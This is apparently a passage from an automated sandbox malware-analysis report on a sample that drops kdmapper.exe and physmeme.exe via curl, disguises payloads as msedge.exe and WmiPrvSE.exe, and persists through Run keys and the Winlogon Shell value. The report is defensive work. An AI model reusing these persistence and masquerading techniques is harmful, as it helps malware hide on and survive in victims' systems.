                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614760
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\__tmp_rar_sfx_access_check_5785406Jump to behavior
                                Source: kdmapper.exe.4.drStatic PE information: section name: .didat
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061F640 push ecx; ret 5_2_0061F653
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061EB78 push eax; ret 5_2_0061EB96
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00440905 push ecx; retf 12_2_00440906
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00452DD9 push eax; retf 12_2_004534E2
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFB4AF34B92 pushad ; retf 16_2_00007FFB4AF34B95
                                Source: C:\Edge\msedge.exeCode function: 16_2_00007FFB4B328B28 push eax; ret 16_2_00007FFB4B328B29
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ADFD2A5 pushad ; iretd 31_2_00007FFB4ADFD2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4AF12314 pushad ; iretd 31_2_00007FFB4AF1232D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4AFE2316 push 8B485F94h; iretd 31_2_00007FFB4AFE231B
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFB4AE0D2A5 pushad ; iretd 32_2_00007FFB4AE0D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFB4AF20DE0 pushad ; retf 32_2_00007FFB4AF20E0D
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFB4AF2AA97 push esp; retf 32_2_00007FFB4AF2AA98
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFB4AFF4000 push eax; iretd 32_2_00007FFB4AFF4001
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FFB4AFF2316 push 8B485F93h; iretd 32_2_00007FFB4AFF231B
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF18AC3 push ss; iretd 39_2_00007FFB4AF18AC9
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF1967D push edi; ret 39_2_00007FFB4AF19688
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF04B92 pushad ; retf 39_2_00007FFB4AF04B95
                                Source: C:\Edge\msedge.exeCode function: 39_2_00007FFB4AF37A05 push eax; iretd 39_2_00007FFB4AF37A4D
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF34B92 pushad ; retf 40_2_00007FFB4AF34B95
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF48AC3 push ss; iretd 40_2_00007FFB4AF48AC9
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF4967D push edi; ret 40_2_00007FFB4AF49688
                                Source: C:\Edge\msedge.exeCode function: 40_2_00007FFB4AF67A05 push eax; iretd 40_2_00007FFB4AF67A4D
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 42_2_00007FFB4AF04B92 pushad ; retf 42_2_00007FFB4AF04B95
                                Source: C:\Edge\msedge.exeCode function: 51_2_00007FFB4AF24B92 pushad ; retf 51_2_00007FFB4AF24B95
                                Source: C:\Edge\msedge.exeCode function: 51_2_00007FFB4B318B28 push eax; ret 51_2_00007FFB4B318B29
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF24B92 pushad ; retf 56_2_00007FFB4AF24B95
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF38AC3 push ss; iretd 56_2_00007FFB4AF38AC9
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF3967D push edi; ret 56_2_00007FFB4AF39688
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeCode function: 56_2_00007FFB4AF57A05 push eax; iretd 56_2_00007FFB4AF57A4D
                                Source: msedge.exe.5.drStatic PE information: section name: .text entropy: 7.556050087022216
                                Source: physmeme.exe.7.drStatic PE information: section name: .text entropy: 7.9965850430662675
                                Source: WmiPrvSE.exe.16.drStatic PE information: section name: .text entropy: 7.556050087022216

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeExecutable created and started: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeExecutable created and started: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\jsWPmlvb.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\KiGKqBgX.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\oYbYVUjG.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\AznuGYbp.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\WmiPrvSE.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\rWfFWfLI.logJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\msedge.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\EagcoYZU.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\OJAsYAeC.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\IlfCUBRc.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ERJdElGX.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\mOEXVCEF.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\IlfCUBRc.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\KiGKqBgX.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\AznuGYbp.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\rWfFWfLI.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\jsWPmlvb.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ERJdElGX.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\OJAsYAeC.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\EagcoYZU.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\oYbYVUjG.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\mOEXVCEF.logJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedgeJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Edge\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
